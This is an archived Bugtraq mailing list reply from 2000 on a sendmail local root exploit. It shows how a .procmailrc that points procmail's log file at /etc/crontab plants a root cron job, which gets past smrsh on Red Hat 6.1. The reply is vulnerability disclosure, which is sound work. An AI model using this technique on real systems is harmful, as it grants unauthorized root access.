Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Sendmail local root exploit on linux 2.2.x

From: iwi () ATM OX AC UK (Alan Iwi)
Date: Mon, 12 Jun 2000 09:28:14 -0000


then create a .forward with:
|/path/to/add


I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward.  But such systems are still vulnerable,
because sendmail is configured to run procmail.  Just
change the exploit to use a .procmailrc file instead of
.forward.  Here's an example:

        LOGFILE=/etc/crontab
        LOG="* * * * * root /tmp/my_dodgy_script.sh
        "
        LOGABSTRACT=no
        
        :0
        /dev/null

Alan
Previous By Date Next
Previous By Thread Next

Current thread: